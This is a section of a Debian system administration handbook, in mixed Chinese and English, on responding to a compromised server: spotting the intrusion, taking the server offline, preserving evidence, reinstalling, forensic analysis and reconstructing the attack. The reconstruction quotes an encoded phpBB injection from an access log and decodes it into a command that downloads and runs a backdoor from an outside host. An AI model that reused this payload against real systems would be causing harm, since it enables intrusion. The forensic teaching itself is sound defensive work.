Product SiteDocumentation Site

14.7. 处理被攻陷的机器

尽管有最好的意图和精心设计的安全策略,管理员最终还是会面对劫持行为。本节提供一些指导,介绍碰到这种情况时如何应对。

14.7.1. 探测并观察黑客入侵

对付侵入的第一步是要注意黑客的这种行为。它通常不是自明的,特别是在没有足够的监控措施时。
Cracking acts are often not detected until they have direct consequences on the legitimate services hosted on the machine, such as connections slowing down, some users being unable to connect, or any other kind of malfunction. Faced with these problems, the administrator needs to have a good look at the machine and carefully scrutinize what misbehaves. This is usually the time when they discover an unusual process, for instance, one named apache instead of the standard /usr/sbin/apache2. If we follow that example, the thing to do is to note its process identifier, and check /proc/pid/exe to see what program this process is currently running:
# ls -al /proc/3719/exe
lrwxrwxrwx 1 www-data www-data 0 2007-04-20 16:19 /proc/3719/exe -> /var/tmp/.bash_httpd/psybnc
一个程序安装在 /var/tmp/ 并作为网页服务器运行?毋庸置疑,机器已经被攻陷了。
此处只是一个示例,但是其他提示也会给管理员敲响警钟:
  • a command that suddenly shows errors like segmentation faults;
  • a program that utilizes all CPU cores or memory;
  • 命令的某个选项不起作用了;命令自己声明的软件版本与根据 dpkg 安装的预期版本不一致;
  • 命令行提示或者会话问候显示最后的连接源于其他洲的未知服务器;
  • /tmp/ 分区已经被错误填满,而且都是由于非法的电影拷贝产生的;
  • 等等。

14.7.2. 把服务器下线

除了非常特殊的情况,破解一般源于网络,攻击者需要连接网络达到目的地(读取机密数据,共享非法文件,使用中继隐藏身份,等等)。将计算机从网络上拔出会阻止攻击者达到这些目标,即使是他们还没能成功攻陷电脑。
This may only be possible if the server is physically accessible. When the server is hosted in a hosting provider's data center halfway across the country, or if the server is not accessible for any other reason, it is usually a good idea to start by gathering some important information (see 第 14.7.3 节 “保留所有可以作为证据的东西”, 第 14.7.5 节 “法医分析” and 第 14.7.6 节 “重构攻击场景”), then isolating that server as much as possible by shutting down as many services as possible (usually, everything but sshd). This case is still awkward, since one can't rule out the possibility of the attacker having SSH access like the administrator has; this makes it harder to “clean” the machines. If possible, and if the provider supports it, the server can be put offline and accessed through the providers KVM/IPMI interface or their rescue console. If the affected machine is a virtual machine, a snapshot should be taken immediately to secure evidence.

14.7.3. 保留所有可以作为证据的东西

要知道针对攻击者的反击和从事法律活动需要所有重要元素的复本;包括硬盘内容,所有允许进程的清单,所有打开连接的清单。RAM 的内容也可以被使用,但是实践中很少使用。
在斗争最激烈的时候,管理员往往倾向于在感染电脑上执行许多检查;这通常不是一个好主意。每个命令都有可能已经被更改了并有可能擦除证据片段。检查应该限制在最小范围内(对于网络连接 netstat -tupan,列出所有进程 ps auxf,正在运行程序的信息 ls -alR /proc/[0-9]*),每个已进行过的检查都要仔细记下来。
Once the “dynamic” elements have been saved, the next step is to store a complete image of the hard-disk. Making such an image is impossible if the filesystem is still evolving, which is why it must be remounted read-only. The simplest solution is often to halt the server brutally (after running sync) and reboot it on a rescue CD. Each partition should be copied with a tool such as dd; these images can be sent to another server (possibly with the very convenient nc tool). Another possibility may be even simpler: just get the disk out of the machine and replace it with a new one that can be reformatted and reinstalled. Most server providers offer a so-called rescue-console that essentially provides the same functionality as a rescue CD.

14.7.4. 重新安装

The server should not be brought back on line without a complete reinstallation. If the compromise was severe (if administrative privileges were obtained), there is almost no other way to be sure that we get rid of everything the attacker may have left behind (particularly backdoors). Of course, all the latest security updates must also be applied so as to plug the vulnerability used by the attacker. Ideally, analyzing the attack should point at this attack vector, so one can be sure of actually fixing it; otherwise, one can only hope that the vulnerability was one of those fixed by the updates.
Reinstalling a remote server is not always easy; it may involve assistance from the hosting company, because not all such companies provide automated reinstallation systems or remote consoles (although these cases should be rare). Care should be taken not to reinstall the machine from backups taken later than the compromise. Ideally, only data should be restored, the actual software should be reinstalled from the installation media.

14.7.5. 法医分析

现在服务被恢复,是时候看看感染系统的磁盘镜像,找到攻击向量了。当加载这些镜像是,注意使用 ro,nodev,noexec,noatime 选项来避免改变其内容(包括读取文件的时间戳)或者误运行感染程序。
追踪痕迹通常需要寻找任何被更改和执行的东西:
  • .bash_history 文件可用于查阅;
  • 也会列出最近创建,修改和读取的文件;
  • strings 通过从二进制中提取字符串,可辅助用于识别攻击者安装的程序;
  • /var/log/ 日志文件可重建事件记录;
  • comparing the system to the last known uncompromised backup can quickly reveal the changes left by the attacker, e.g. files added, changed, or deleted;
  • 特殊用途的工具可用于恢复潜在被删除的文件,包括攻击者删除的日志文件。
Some of these operations can be made easier with specialized software. In particular, the sleuthkit package provides many tools to analyze a filesystem. Their use is made easier by the Autopsy Forensic Browser graphical interface (in the autopsy package). Some Linux distributions have a "live install" image and contain many programs for forensic analysis, such as Kali Linux (see 第 A.8 节 “Kali Linux”), with its forensic mode, BlackArchLinux, and the commercial Grml-Forensic, based on Grml (see 第 A.6 节 “Grml”).

14.7.6. 重构攻击场景

在分析过程中搜集到的所有元素应该像拼图一片一片组合起来;第一个可疑文件通常和提供突破口的日志文件相关。现实世界中的例子比冗长的理论明了。
下面的日志文件截取自 Apache access.log
www.falcot.com 200.58.141.84 - - [27/Nov/2004:13:33:34 +0100] "GET /phpbb/viewtopic.php?t=10&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(32)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(103)%252echr(97)%252echr(98)%252echr(114)%252echr(121)%252echr(107)%252echr(46)%252echr(97)%252echr(108)%252echr(116)%252echr(101)%252echr(114)%252echr(118)%252echr(105)%252echr(115)%252echr(116)%252echr(97)%252echr(46)%252echr(111)%252echr(114)%252echr(103)%252echr(47)%252echr(98)%252echr(100)%252echr(32)%252echr(124)%252echr(124)%252echr(32)%252echr(99)%252echr(117)%252echr(114)%252echr(108)%252echr(32)%252echr(103)%252echr(97)%252echr(98)%252echr(114)%252echr(121)%252echr(107)%252echr(46)%252echr(97)%252echr(108)%252echr(116)%252echr(101)%252echr(114)%252echr(118)%252echr(105)%252echr(115)%252echr(116)%252echr(97)%252echr(46)%252echr(111)%252echr(114)%252echr(103)%252echr(47)%252echr(98)%252echr(100)%252echr(32)%252echr(45)%252echr(111)%252echr(32)%252echr(98)%252echr(100)%252echr(59)%252echr(32)%252echr(99)%252echr(104)%252echr(109)%252echr(111)%252echr(100)%252echr(32)%252echr(43)%252echr(120)%252echr(32)%252echr(98)%252echr(100)%252echr(59)%252echr(32)%252echr(46)%252echr(47)%252echr(98)%252echr(100)%252echr(32)%252echr(38))%252e%2527 HTTP/1.1" 200 27969 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
This example matches exploitation of an old security vulnerability in phpBB.
破译这段 URL 就会明白,攻击者成功运行了一些 PHP 代码,即:system("cd /tmp; wget gabryk.altervista.org/bd || curl gabryk.altervista.org/bd -o bd; chmod +x bd; ./bd &")。实际上,在/tmp/会发现一个 bd 文件。运行 strings /mnt/tmp/bd 会发现字符串 PsychoPhobia Backdoor is starting...。这也确实看起来像个后门。
随后,访问权限会被用来下载,安装和运行连接到地下 IRC 网络的 机器人-bot。这个机器人通过 IRC 协议控制,用于下载文件并共享。程序甚至有自己的日志文件:
** 2004-11-29-19:50:15: NOTICE: :GAB!sex@Rizon-2EDFBC28.pool8250.interbusiness.it NOTICE ReV|DivXNeW|504 :DCC Chat (82.50.72.202)
** 2004-11-29-19:50:15: DCC CHAT attempt authorized from GAB!SEX@RIZON-2EDFBC28.POOL8250.INTERBUSINESS.IT
** 2004-11-29-19:50:15: DCC CHAT received from GAB, attempting connection to 82.50.72.202:1024
** 2004-11-29-19:50:15: DCC CHAT connection suceeded, authenticating
** 2004-11-29-19:50:20: DCC CHAT Correct password
(...)
** 2004-11-29-19:50:49: DCC Send Accepted from ReV|DivXNeW|502: In.Ostaggio-iTa.Oper_-DvdScr.avi (713034KB)
(...)
** 2004-11-29-20:10:11: DCC Send Accepted from GAB: La_tela_dell_assassino.avi (666615KB)
(...)
** 2004-11-29-21:10:36: DCC Upload: Transfer Completed (666615 KB, 1 hr 24 sec, 183.9 KB/sec)
(...)
** 2004-11-29-22:18:57: DCC Upload: Transfer Completed (713034 KB, 2 hr 28 min 7 sec, 80.2 KB/sec)
跟踪记录显示有两个视频文件被存储在服务器上了。
同时,攻击者也下载了一对额外文件,/tmp/pt/tmp/loginx。运行 strings 命令分析文件会发现诸如Shellcode placed at 0x%08lxNow wait for suid shell...。这些看起来像是程序利用本地漏洞获取管理员特权。他们达到目的了吗?本例中,视乎没有,因为在他们开始活动之后,看起来没有文件被修改。
本例中,整个入侵过程被重构。可以推断,攻击者已经能够利用被侵入的系统三天左右;分析的成果在于漏洞已经被识别出来,并且管理员可以确保在下一次安装时确实修复了该漏洞。